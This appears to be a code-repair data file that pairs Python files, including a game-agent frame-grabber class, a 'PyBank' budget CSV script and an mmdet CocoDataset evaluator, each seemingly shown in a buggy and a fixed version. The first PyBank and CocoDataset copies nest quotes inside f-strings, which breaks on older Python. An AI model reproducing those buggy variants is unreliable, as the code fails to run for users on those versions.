signal.signal(signal.SIGINT, self._handle_signal)
signal.signal(signal.SIGTERM, self._handle_signal)
atexit.register(self._handle_signal, 15, None, False)
@offshoot.forbidden
def stop_frame_grabber(self):
if self.frame_grabber_process is None:
return None
self.frame_grabber_process.kill()
self.frame_grabber_process = None
atexit.unregister(self._handle_signal)
@offshoot.forbidden
def grab_latest_frame(self):
game_frame_buffer, game_frame_buffer_pipeline = FrameGrabber.get_frames_with_pipeline([0])
return game_frame_buffer.frames[0], game_frame_buffer_pipeline.frames[0]
def _discover_sprites(self):
plugin_path = offshoot.config["file_paths"]["plugins"]
sprites = dict()
sprite_path = f"{plugin_path}/{self.__class__.__name__}Plugin/files/data/sprites"
if os.path.isdir(sprite_path):
files = os.scandir(sprite_path)
for file in files:
if file.name.endswith(".png"):
sprite_name = "_".join(file.name.split("/")[-1].split("_")[:-1]).replace(".png", "").upper()
sprite_image_data = skimage.io.imread(f"{sprite_path}/{file.name}")
sprite_image_data = sprite_image_data[..., np.newaxis]
if sprite_name not in sprites:
sprite = Sprite(sprite_name, image_data=sprite_image_data)
sprites[sprite_name] = sprite
else:
sprites[sprite_name].append_image_data(sprite_image_data)
return sprites
def _handle_signal(self, signum=15, frame=None, do_exit=True):
if self.frame_grabber_process is not None:
if self.frame_grabber_process.poll() is None:
self.frame_grabber_process.send_signal(signum)
if do_exit:
exit()
|
#PyBank
#imports
import pathlib
import csv
#input/output paths
input_path = pathlib.Path("Resources/budget_data.csv")
output_path = pathlib.Path("Analysis/results.txt")
#make dictionary for result values
result_values = {
"total_months": 0,
"total": 0,
"average_change": None,
"greatest_increase_in_profits": 0,
"greatest_decrease_in_profits": 0,
}
#helper vars
prev_profit = None
total_profit_change = 0
greatest_increase_month = ""
greatest_decrease_month = ""
#open input file
with open(input_path, 'r') as budget_file:
#create reader cursor and skip the header
reader_cursor = csv.reader(budget_file, delimiter=',')
header = next(reader_cursor)
profit_change = 0
for row in reader_cursor:
#count each month
result_values["total_months"] += 1
#calculate change in profit
current_profit = int(row[1])
#if prev_profit has been recorded
if prev_profit != None:
profit_change = current_profit - prev_profit
total_profit_change += profit_change
#record prev_profit for next loop
prev_profit = int(row[1])
#add money to total
result_values["total"] += int(row[1])
#update greatest/least change in profit
if result_values["greatest_increase_in_profits"] < profit_change:
result_values["greatest_increase_in_profits"] = profit_change
greatest_increase_month = row[0]
if result_values["greatest_decrease_in_profits"] > profit_change:
result_values["greatest_decrease_in_profits"] = profit_change
greatest_decrease_month = row[0]
#calculate average change in profit
result_values["average_change"] = round(total_profit_change / (result_values["total_months"] - 1), 2)
#result in lines
result_lines = [
"Financial Analysis",
"-------------------------",
f'Total Months: {result_values['total_months']}',
f'Total: ${result_values['total']}',
f'Average Change: ${result_values['average_change']}',
f'Greatest Increase in Profits: {greatest_increase_month} ${result_values['greatest_increase_in_profits']}',
f'Greatest Decrease in Profits: {greatest_decrease_month} ${result_values['greatest_decrease_in_profits']}',
]
#print results to terminal
for result in result_lines:
print(result)
# write results to file
result_file = open(output_path, 'w')
for line in result_lines:
result_file.write(line)
result_file.write('\n')
result_file.close()
| #PyBank
#imports
import pathlib
import csv
#input/output paths
input_path = pathlib.Path("Resources/budget_data.csv")
output_path = pathlib.Path("Analysis/results.txt")
#make dictionary for result values
result_values = {
"total_months": 0,
"total": 0,
"average_change": None,
"greatest_increase_in_profits": 0,
"greatest_decrease_in_profits": 0,
}
#helper vars
prev_profit = None
total_profit_change = 0
greatest_increase_month = ""
greatest_decrease_month = ""
#open input file
with open(input_path, 'r') as budget_file:
#create reader cursor and skip the header
reader_cursor = csv.reader(budget_file, delimiter=',')
header = next(reader_cursor)
profit_change = 0
for row in reader_cursor:
#count each month
result_values["total_months"] += 1
#calculate change in profit
current_profit = int(row[1])
#if prev_profit has been recorded
if prev_profit != None:
profit_change = current_profit - prev_profit
total_profit_change += profit_change
#record prev_profit for next loop
prev_profit = int(row[1])
#add money to total
result_values["total"] += int(row[1])
#update greatest/least change in profit
if result_values["greatest_increase_in_profits"] < profit_change:
result_values["greatest_increase_in_profits"] = profit_change
greatest_increase_month = row[0]
if result_values["greatest_decrease_in_profits"] > profit_change:
result_values["greatest_decrease_in_profits"] = profit_change
greatest_decrease_month = row[0]
#calculate average change in profit
result_values["average_change"] = round(total_profit_change / (result_values["total_months"] - 1), 2)
#result in lines
result_lines = [
"Financial Analysis",
"-------------------------",
f'Total Months: {result_values["total_months"]}',
f'Total: ${result_values["total"]}',
f'Average Change: ${result_values["average_change"]}',
f'Greatest Increase in Profits: {greatest_increase_month} ${result_values["greatest_increase_in_profits"]}',
f'Greatest Decrease in Profits: {greatest_decrease_month} ${result_values["greatest_decrease_in_profits"]}',
]
#print results to terminal
for result in result_lines:
print(result)
# write results to file
result_file = open(output_path, 'w')
for line in result_lines:
result_file.write(line)
result_file.write('\n')
result_file.close()
|
# Copyright (c) OpenMMLab. All rights reserved.
import itertools
import logging
import os.path as osp
import tempfile
import warnings
from collections import OrderedDict
import mmcv
import numpy as np
from mmcv.utils import print_log
from terminaltables import AsciiTable
from mmdet.core import eval_recalls
from .api_wrappers import COCO, COCOeval
from .builder import DATASETS
from .custom import CustomDataset
from .usbeval import USBeval
@DATASETS.register_module()
class CocoDataset(CustomDataset):
CLASSES = ('person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus',
'train', 'truck', 'boat', 'traffic light', 'fire hydrant',
'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog',
'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe',
'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',
'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat',
'baseball glove', 'skateboard', 'surfboard', 'tennis racket',
'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl',
'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot',
'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',
'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop',
'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',
'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock',
'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush')
def load_annotations(self, ann_file):
"""Load annotation from COCO style annotation file.
Args:
ann_file (str): Path of annotation file.
Returns:
list[dict]: Annotation info from COCO api.
"""
self.coco = COCO(ann_file)
# The order of returned `cat_ids` will not
# change with the order of the CLASSES
self.cat_ids = self.coco.get_cat_ids(cat_names=self.CLASSES)
self.cat2label = {cat_id: i for i, cat_id in enumerate(self.cat_ids)}
self.img_ids = self.coco.get_img_ids()
data_infos = []
total_ann_ids = []
for i in self.img_ids:
info = self.coco.load_imgs([i])[0]
info['filename'] = info['file_name']
data_infos.append(info)
ann_ids = self.coco.get_ann_ids(img_ids=[i])
total_ann_ids.extend(ann_ids)
assert len(set(total_ann_ids)) == len(
total_ann_ids), f"Annotation ids in '{ann_file}' are not unique!"
return data_infos
def get_ann_info(self, idx):
"""Get COCO annotation by index.
Args:
idx (int): Index of data.
Returns:
dict: Annotation info of specified index.
"""
img_id = self.data_infos[idx]['id']
ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
ann_info = self.coco.load_anns(ann_ids)
return self._parse_ann_info(self.data_infos[idx], ann_info)
def get_cat_ids(self, idx):
"""Get COCO category ids by index.
Args:
idx (int): Index of data.
Returns:
list[int]: All categories in the image of specified index.
"""
img_id = self.data_infos[idx]['id']
ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
ann_info = self.coco.load_anns(ann_ids)
return [ann['category_id'] for ann in ann_info]
def _filter_imgs(self, min_size=32):
"""Filter images too small or without ground truths."""
valid_inds = []
# obtain images that contain annotation
ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())
# obtain images that contain annotations of the required categories
ids_in_cat = set()
for i, class_id in enumerate(self.cat_ids):
ids_in_cat |= set(self.coco.cat_img_map[class_id])
# merge the image id sets of the two conditions and use the merged set
# to filter out images if self.filter_empty_gt=True
ids_in_cat &= ids_with_ann
valid_img_ids = []
for i, img_info in enumerate(self.data_infos):
img_id = self.img_ids[i]
if self.filter_empty_gt and img_id not in ids_in_cat:
continue
if min(img_info['width'], img_info['height']) >= min_size:
valid_inds.append(i)
valid_img_ids.append(img_id)
self.img_ids = valid_img_ids
return valid_inds
def _parse_ann_info(self, img_info, ann_info):
"""Parse bbox and mask annotation.
Args:
ann_info (list[dict]): Annotation info of an image.
with_mask (bool): Whether to parse mask annotations.
Returns:
dict: A dict containing the following keys: bboxes, bboxes_ignore,\
labels, masks, seg_map. "masks" are raw annotations and not \
decoded into binary masks.
"""
gt_bboxes = []
gt_labels = []
gt_bboxes_ignore = []
gt_masks_ann = []
for i, ann in enumerate(ann_info):
if ann.get('ignore', False):
continue
x1, y1, w, h = ann['bbox']
inter_w = max(0, min(x1 + w, img_info['width']) - max(x1, 0))
inter_h = max(0, min(y1 + h, img_info['height']) - max(y1, 0))
if inter_w * inter_h == 0:
continue
if ann['area'] <= 0 or w < 1 or h < 1:
continue
if ann['category_id'] not in self.cat_ids:
continue
bbox = [x1, y1, x1 + w, y1 + h]
if ann.get('iscrowd', False):
gt_bboxes_ignore.append(bbox)
else:
gt_bboxes.append(bbox)
gt_labels.append(self.cat2label[ann['category_id']])
gt_masks_ann.append(ann.get('segmentation', None))
if gt_bboxes:
gt_bboxes = np.array(gt_bboxes, dtype=np.float32)
gt_labels = np.array(gt_labels, dtype=np.int64)
else:
gt_bboxes = np.zeros((0, 4), dtype=np.float32)
gt_labels = np.array([], dtype=np.int64)
if gt_bboxes_ignore:
gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)
else:
gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)
seg_map = img_info['filename'].replace('jpg', 'png')
ann = dict(
bboxes=gt_bboxes,
labels=gt_labels,
bboxes_ignore=gt_bboxes_ignore,
masks=gt_masks_ann,
seg_map=seg_map)
return ann
def xyxy2xywh(self, bbox):
"""Convert ``xyxy`` style bounding boxes to ``xywh`` style for COCO
evaluation.
Args:
bbox (numpy.ndarray): The bounding boxes, shape (4, ), in
``xyxy`` order.
Returns:
list[float]: The converted bounding boxes, in ``xywh`` order.
"""
_bbox = bbox.tolist()
return [
_bbox[0],
_bbox[1],
_bbox[2] - _bbox[0],
_bbox[3] - _bbox[1],
]
def _proposal2json(self, results):
"""Convert proposal results to COCO json style."""
json_results = []
for idx in range(len(self)):
img_id = self.img_ids[idx]
bboxes = results[idx]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(bboxes[i][4])
data['category_id'] = 1
json_results.append(data)
return json_results
def _det2json(self, results):
"""Convert detection results to COCO json style."""
json_results = []
for idx in range(len(self)):
img_id = self.img_ids[idx]
result = results[idx]
for label in range(len(result)):
bboxes = result[label]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(bboxes[i][4])
data['category_id'] = self.cat_ids[label]
json_results.append(data)
return json_results
def _segm2json(self, results):
"""Convert instance segmentation results to COCO json style."""
bbox_json_results = []
segm_json_results = []
for idx in range(len(self)):
img_id = self.img_ids[idx]
det, seg = results[idx]
for label in range(len(det)):
# bbox results
bboxes = det[label]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(bboxes[i][4])
data['category_id'] = self.cat_ids[label]
bbox_json_results.append(data)
# segm results
# some detectors use different scores for bbox and mask
if isinstance(seg, tuple):
segms = seg[0][label]
mask_score = seg[1][label]
else:
segms = seg[label]
mask_score = [bbox[4] for bbox in bboxes]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(mask_score[i])
data['category_id'] = self.cat_ids[label]
if isinstance(segms[i]['counts'], bytes):
segms[i]['counts'] = segms[i]['counts'].decode()
data['segmentation'] = segms[i]
segm_json_results.append(data)
return bbox_json_results, segm_json_results
def results2json(self, results, outfile_prefix):
"""Dump the detection results to a COCO style json file.
There are 3 types of results: proposals, bbox predictions, mask
predictions, and they have different data types. This method will
automatically recognize the type, and dump them to json files.
Args:
results (list[list | tuple | ndarray]): Testing results of the
dataset.
outfile_prefix (str): The filename prefix of the json files. If the
prefix is "somepath/xxx", the json files will be named
"somepath/xxx.bbox.json", "somepath/xxx.segm.json",
"somepath/xxx.proposal.json".
Returns:
dict[str: str]: Possible keys are "bbox", "segm", "proposal", and \
values are corresponding filenames.
"""
result_files = dict()
if isinstance(results[0], list):
json_results = self._det2json(results)
result_files['bbox'] = f'{outfile_prefix}.bbox.json'
result_files['proposal'] = f'{outfile_prefix}.bbox.json'
mmcv.dump(json_results, result_files['bbox'])
elif isinstance(results[0], tuple):
json_results = self._segm2json(results)
result_files['bbox'] = f'{outfile_prefix}.bbox.json'
result_files['proposal'] = f'{outfile_prefix}.bbox.json'
result_files['segm'] = f'{outfile_prefix}.segm.json'
mmcv.dump(json_results[0], result_files['bbox'])
mmcv.dump(json_results[1], result_files['segm'])
elif isinstance(results[0], np.ndarray):
json_results = self._proposal2json(results)
result_files['proposal'] = f'{outfile_prefix}.proposal.json'
mmcv.dump(json_results, result_files['proposal'])
else:
raise TypeError('invalid type of results')
return result_files
def fast_eval_recall(self, results, proposal_nums, iou_thrs, logger=None):
gt_bboxes = []
for i in range(len(self.img_ids)):
ann_ids = self.coco.get_ann_ids(img_ids=self.img_ids[i])
ann_info = self.coco.load_anns(ann_ids)
if len(ann_info) == 0:
gt_bboxes.append(np.zeros((0, 4)))
continue
bboxes = []
for ann in ann_info:
if ann.get('ignore', False) or ann['iscrowd']:
continue
x1, y1, w, h = ann['bbox']
bboxes.append([x1, y1, x1 + w, y1 + h])
bboxes = np.array(bboxes, dtype=np.float32)
if bboxes.shape[0] == 0:
bboxes = np.zeros((0, 4))
gt_bboxes.append(bboxes)
recalls = eval_recalls(
gt_bboxes, results, proposal_nums, iou_thrs, logger=logger)
ar = recalls.mean(axis=1)
return ar
def format_results(self, results, jsonfile_prefix=None, **kwargs):
"""Format the results to json (standard format for COCO evaluation).
Args:
results (list[tuple | numpy.ndarray]): Testing results of the
dataset.
jsonfile_prefix (str | None): The prefix of json files. It includes
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
Returns:
tuple: (result_files, tmp_dir), result_files is a dict containing \
the json filepaths, tmp_dir is the temporal directory created \
for saving json files when jsonfile_prefix is not specified.
"""
assert isinstance(results, list), 'results must be a list'
assert len(results) == len(self), (
'The length of results is not equal to the dataset len: {} != {}'.
format(len(results), len(self)))
if jsonfile_prefix is None:
tmp_dir = tempfile.TemporaryDirectory()
jsonfile_prefix = osp.join(tmp_dir.name, 'results')
else:
tmp_dir = None
result_files = self.results2json(results, jsonfile_prefix)
return result_files, tmp_dir
def evaluate(self,
results,
metric='bbox',
logger=None,
jsonfile_prefix=None,
classwise=True,
proposal_nums=(1, 10, 100),
iou_thrs=None,
usb_eval=True,
area_range_type='absolute_scale_ap'):
"""Evaluation in COCO protocol.
Args:
results (list[list | tuple]): Testing results of the dataset.
metric (str | list[str]): Metrics to be evaluated. Options are
'bbox', 'segm', 'proposal', 'proposal_fast'.
logger (logging.Logger | str | None): Logger used for printing
related information during evaluation. Default: None.
jsonfile_prefix (str | None): The prefix of json files. It includes
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
classwise (bool): Whether to evaluating the AP for each class.
proposal_nums (Sequence[int]): Proposal number used for evaluating
recalls, such as recall@100, recall@1000.
Default: (100, 300, 1000).
iou_thrs (Sequence[float], optional): IoU threshold used for
evaluating recalls/mAPs. If set to a list, the average of all
IoUs will also be computed. If not specified, [0.50, 0.55,
0.60, 0.65, 0.70, 0.75, 0.80, 0.85, 0.90, 0.95] will be used.
Default: None.
area_range_type (str, optional): Type of area range to compute
scale-wise AP metrics. Default: 'COCO'.
Returns:
dict[str, float]: COCO style evaluation metric.
"""
metrics = metric if isinstance(metric, list) else [metric]
allowed_metrics = ['bbox', 'segm', 'proposal', 'proposal_fast']
for metric in metrics:
if metric not in allowed_metrics:
raise KeyError(f'metric {metric} is not supported')
if iou_thrs is None:
iou_thrs = np.linspace(.5, 0.95, int(np.round((0.95 - .5) / .05)) + 1, endpoint=True)
result_files, tmp_dir = self.format_results(results, jsonfile_prefix)
eval_results = OrderedDict()
cocoGt = self.coco
for metric in metrics:
msg = f'Evaluating {metric}...'
if logger is None:
msg = '\n' + msg
print_log(msg, logger=logger)
if metric == 'proposal_fast':
ar = self.fast_eval_recall(
results, proposal_nums, iou_thrs, logger='silent')
log_msg = []
for i, num in enumerate(proposal_nums):
eval_results[f'AR@{num}'] = ar[i]
log_msg.append(f'\nAR@{num}\t{ar[i]:.4f}')
log_msg = ''.join(log_msg)
print_log(log_msg, logger=logger)
continue
iou_type = 'bbox' if metric == 'proposal' else metric
if metric not in result_files:
raise KeyError(f'{metric} is not in results')
try:
predictions = mmcv.load(result_files[metric])
if iou_type == 'segm':
# Refer to https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocotools/coco.py#L331 # noqa
# When evaluating mask AP, if the results contain bbox, cocoapi will use the box area instead of the mask area for calculating the instance area. Though the overall AP is not affected, this leads to different small/medium/large mask AP results.
for x in predictions:
x.pop('bbox')
warnings.simplefilter('once')
warnings.warn('The key "bbox" is deleted for more accurate mask AP of small/medium/large instances since v2.12.0. This does not change the overall mAP calculation.',
UserWarning)
cocoDt = cocoGt.loadRes(predictions)
except IndexError:
print_log(
'The testing results of the whole dataset is empty.',
logger=logger,
level=logging.ERROR)
break
cocoEval = USBeval(cocoGt, cocoDt, iou_type, area_range_type=area_range_type)
cocoEval.params.catIds = self.cat_ids
cocoEval.params.imgIds = self.img_ids
cocoEval.params.maxDets = list(proposal_nums)
cocoEval.params.iouThrs = iou_thrs
if metric == 'proposal':
cocoEval.params.useCats = 0
cocoEval.evaluate()
cocoEval.accumulate()
cocoEval.summarize()
for key, val in cocoEval.stats.items():
if key.startswith('mAP'):
key = f'{metric}_{key}'
eval_results[key] = float(f'{val:.4f}')
else:
cocoEval.evaluate()
cocoEval.accumulate()
cocoEval.summarize()
for key, val in cocoEval.stats.items():
if key.startswith('mAP'):
key = f'{metric}_{key}'
eval_results[key] = float(f'{val:.4f}')
if classwise: # Compute per-category AP
# Compute per-category AP
# from https://github.com/facebookresearch/detectron2/
precisions = cocoEval.eval['precision']
aps = []
# precision: (iou, recall, cls, area range, max dets)
assert len(self.cat_ids) == precisions.shape[2]
results_per_category = []
for idx, catId in enumerate(self.cat_ids):
# area range index 0: all area ranges
# max dets index -1: typically 100 per image
nm = self.coco.loadCats(catId)[0]
precision = precisions[:, :, idx, 0, -1]
precision = precision[precision > -1]
if precision.size:
ap = np.mean(precision)
else:
ap = float('nan')
aps.append(ap)
results_per_category.append((f'{nm['name']}', f'{float(ap):0.4f}'))
eval_results['AP_per_class'] = aps
num_columns = min(6, len(results_per_category) * 2)
results_flatten = list(
itertools.chain(*results_per_category))
headers = ['category', 'AP'] * (num_columns // 2)
results_2d = itertools.zip_longest(*[
results_flatten[i::num_columns]
for i in range(num_columns)
])
table_data = [headers]
table_data += [result for result in results_2d]
table = AsciiTable(table_data)
print_log('\n' + table.table, logger=logger)
try:
copypastes = []
coco_metrics = ['mAP', 'mAP_50', 'mAP_75', 'mAP_s', 'mAP_m', 'mAP_l']
for coco_metric in coco_metrics:
copypastes.append(f'{cocoEval.stats[coco_metric]:.4f}')
mAP_copypaste = ' '.join(copypastes)
eval_results[f'{metric}_mAP_copypaste'] = mAP_copypaste
except KeyError:
pass
if tmp_dir is not None:
tmp_dir.cleanup()
return eval_results | # Copyright (c) OpenMMLab. All rights reserved.
import itertools
import logging
import os.path as osp
import tempfile
import warnings
from collections import OrderedDict
import mmcv
import numpy as np
from mmcv.utils import print_log
from terminaltables import AsciiTable
from mmdet.core import eval_recalls
from .api_wrappers import COCO, COCOeval
from .builder import DATASETS
from .custom import CustomDataset
from .usbeval import USBeval
@DATASETS.register_module()
class CocoDataset(CustomDataset):
CLASSES = ('person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus',
'train', 'truck', 'boat', 'traffic light', 'fire hydrant',
'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog',
'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe',
'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',
'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat',
'baseball glove', 'skateboard', 'surfboard', 'tennis racket',
'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl',
'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot',
'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',
'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop',
'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',
'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock',
'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush')
def load_annotations(self, ann_file):
"""Load annotation from COCO style annotation file.
Args:
ann_file (str): Path of annotation file.
Returns:
list[dict]: Annotation info from COCO api.
"""
self.coco = COCO(ann_file)
# The order of returned `cat_ids` will not
# change with the order of the CLASSES
self.cat_ids = self.coco.get_cat_ids(cat_names=self.CLASSES)
self.cat2label = {cat_id: i for i, cat_id in enumerate(self.cat_ids)}
self.img_ids = self.coco.get_img_ids()
data_infos = []
total_ann_ids = []
for i in self.img_ids:
info = self.coco.load_imgs([i])[0]
info['filename'] = info['file_name']
data_infos.append(info)
ann_ids = self.coco.get_ann_ids(img_ids=[i])
total_ann_ids.extend(ann_ids)
assert len(set(total_ann_ids)) == len(
total_ann_ids), f"Annotation ids in '{ann_file}' are not unique!"
return data_infos
def get_ann_info(self, idx):
"""Get COCO annotation by index.
Args:
idx (int): Index of data.
Returns:
dict: Annotation info of specified index.
"""
img_id = self.data_infos[idx]['id']
ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
ann_info = self.coco.load_anns(ann_ids)
return self._parse_ann_info(self.data_infos[idx], ann_info)
def get_cat_ids(self, idx):
"""Get COCO category ids by index.
Args:
idx (int): Index of data.
Returns:
list[int]: All categories in the image of specified index.
"""
img_id = self.data_infos[idx]['id']
ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
ann_info = self.coco.load_anns(ann_ids)
return [ann['category_id'] for ann in ann_info]
def _filter_imgs(self, min_size=32):
"""Filter images too small or without ground truths."""
valid_inds = []
# obtain images that contain annotation
ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())
# obtain images that contain annotations of the required categories
ids_in_cat = set()
for i, class_id in enumerate(self.cat_ids):
ids_in_cat |= set(self.coco.cat_img_map[class_id])
# merge the image id sets of the two conditions and use the merged set
# to filter out images if self.filter_empty_gt=True
ids_in_cat &= ids_with_ann
valid_img_ids = []
for i, img_info in enumerate(self.data_infos):
img_id = self.img_ids[i]
if self.filter_empty_gt and img_id not in ids_in_cat:
continue
if min(img_info['width'], img_info['height']) >= min_size:
valid_inds.append(i)
valid_img_ids.append(img_id)
self.img_ids = valid_img_ids
return valid_inds
def _parse_ann_info(self, img_info, ann_info):
"""Parse bbox and mask annotation.
Args:
ann_info (list[dict]): Annotation info of an image.
with_mask (bool): Whether to parse mask annotations.
Returns:
dict: A dict containing the following keys: bboxes, bboxes_ignore,\
labels, masks, seg_map. "masks" are raw annotations and not \
decoded into binary masks.
"""
gt_bboxes = []
gt_labels = []
gt_bboxes_ignore = []
gt_masks_ann = []
for i, ann in enumerate(ann_info):
if ann.get('ignore', False):
continue
x1, y1, w, h = ann['bbox']
inter_w = max(0, min(x1 + w, img_info['width']) - max(x1, 0))
inter_h = max(0, min(y1 + h, img_info['height']) - max(y1, 0))
if inter_w * inter_h == 0:
continue
if ann['area'] <= 0 or w < 1 or h < 1:
continue
if ann['category_id'] not in self.cat_ids:
continue
bbox = [x1, y1, x1 + w, y1 + h]
if ann.get('iscrowd', False):
gt_bboxes_ignore.append(bbox)
else:
gt_bboxes.append(bbox)
gt_labels.append(self.cat2label[ann['category_id']])
gt_masks_ann.append(ann.get('segmentation', None))
if gt_bboxes:
gt_bboxes = np.array(gt_bboxes, dtype=np.float32)
gt_labels = np.array(gt_labels, dtype=np.int64)
else:
gt_bboxes = np.zeros((0, 4), dtype=np.float32)
gt_labels = np.array([], dtype=np.int64)
if gt_bboxes_ignore:
gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)
else:
gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)
seg_map = img_info['filename'].replace('jpg', 'png')
ann = dict(
bboxes=gt_bboxes,
labels=gt_labels,
bboxes_ignore=gt_bboxes_ignore,
masks=gt_masks_ann,
seg_map=seg_map)
return ann
def xyxy2xywh(self, bbox):
"""Convert ``xyxy`` style bounding boxes to ``xywh`` style for COCO
evaluation.
Args:
bbox (numpy.ndarray): The bounding boxes, shape (4, ), in
``xyxy`` order.
Returns:
list[float]: The converted bounding boxes, in ``xywh`` order.
"""
_bbox = bbox.tolist()
return [
_bbox[0],
_bbox[1],
_bbox[2] - _bbox[0],
_bbox[3] - _bbox[1],
]
def _proposal2json(self, results):
"""Convert proposal results to COCO json style."""
json_results = []
for idx in range(len(self)):
img_id = self.img_ids[idx]
bboxes = results[idx]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(bboxes[i][4])
data['category_id'] = 1
json_results.append(data)
return json_results
def _det2json(self, results):
"""Convert detection results to COCO json style."""
json_results = []
for idx in range(len(self)):
img_id = self.img_ids[idx]
result = results[idx]
for label in range(len(result)):
bboxes = result[label]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(bboxes[i][4])
data['category_id'] = self.cat_ids[label]
json_results.append(data)
return json_results
def _segm2json(self, results):
"""Convert instance segmentation results to COCO json style."""
bbox_json_results = []
segm_json_results = []
for idx in range(len(self)):
img_id = self.img_ids[idx]
det, seg = results[idx]
for label in range(len(det)):
# bbox results
bboxes = det[label]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(bboxes[i][4])
data['category_id'] = self.cat_ids[label]
bbox_json_results.append(data)
# segm results
# some detectors use different scores for bbox and mask
if isinstance(seg, tuple):
segms = seg[0][label]
mask_score = seg[1][label]
else:
segms = seg[label]
mask_score = [bbox[4] for bbox in bboxes]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(mask_score[i])
data['category_id'] = self.cat_ids[label]
if isinstance(segms[i]['counts'], bytes):
segms[i]['counts'] = segms[i]['counts'].decode()
data['segmentation'] = segms[i]
segm_json_results.append(data)
return bbox_json_results, segm_json_results
def results2json(self, results, outfile_prefix):
"""Dump the detection results to a COCO style json file.
There are 3 types of results: proposals, bbox predictions, mask
predictions, and they have different data types. This method will
automatically recognize the type, and dump them to json files.
Args:
results (list[list | tuple | ndarray]): Testing results of the
dataset.
outfile_prefix (str): The filename prefix of the json files. If the
prefix is "somepath/xxx", the json files will be named
"somepath/xxx.bbox.json", "somepath/xxx.segm.json",
"somepath/xxx.proposal.json".
Returns:
dict[str: str]: Possible keys are "bbox", "segm", "proposal", and \
values are corresponding filenames.
"""
result_files = dict()
if isinstance(results[0], list):
json_results = self._det2json(results)
result_files['bbox'] = f'{outfile_prefix}.bbox.json'
result_files['proposal'] = f'{outfile_prefix}.bbox.json'
mmcv.dump(json_results, result_files['bbox'])
elif isinstance(results[0], tuple):
json_results = self._segm2json(results)
result_files['bbox'] = f'{outfile_prefix}.bbox.json'
result_files['proposal'] = f'{outfile_prefix}.bbox.json'
result_files['segm'] = f'{outfile_prefix}.segm.json'
mmcv.dump(json_results[0], result_files['bbox'])
mmcv.dump(json_results[1], result_files['segm'])
elif isinstance(results[0], np.ndarray):
json_results = self._proposal2json(results)
result_files['proposal'] = f'{outfile_prefix}.proposal.json'
mmcv.dump(json_results, result_files['proposal'])
else:
raise TypeError('invalid type of results')
return result_files
def fast_eval_recall(self, results, proposal_nums, iou_thrs, logger=None):
gt_bboxes = []
for i in range(len(self.img_ids)):
ann_ids = self.coco.get_ann_ids(img_ids=self.img_ids[i])
ann_info = self.coco.load_anns(ann_ids)
if len(ann_info) == 0:
gt_bboxes.append(np.zeros((0, 4)))
continue
bboxes = []
for ann in ann_info:
if ann.get('ignore', False) or ann['iscrowd']:
continue
x1, y1, w, h = ann['bbox']
bboxes.append([x1, y1, x1 + w, y1 + h])
bboxes = np.array(bboxes, dtype=np.float32)
if bboxes.shape[0] == 0:
bboxes = np.zeros((0, 4))
gt_bboxes.append(bboxes)
recalls = eval_recalls(
gt_bboxes, results, proposal_nums, iou_thrs, logger=logger)
ar = recalls.mean(axis=1)
return ar
def format_results(self, results, jsonfile_prefix=None, **kwargs):
"""Format the results to json (standard format for COCO evaluation).
Args:
results (list[tuple | numpy.ndarray]): Testing results of the
dataset.
jsonfile_prefix (str | None): The prefix of json files. It includes
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
Returns:
tuple: (result_files, tmp_dir), result_files is a dict containing \
the json filepaths, tmp_dir is the temporal directory created \
for saving json files when jsonfile_prefix is not specified.
"""
assert isinstance(results, list), 'results must be a list'
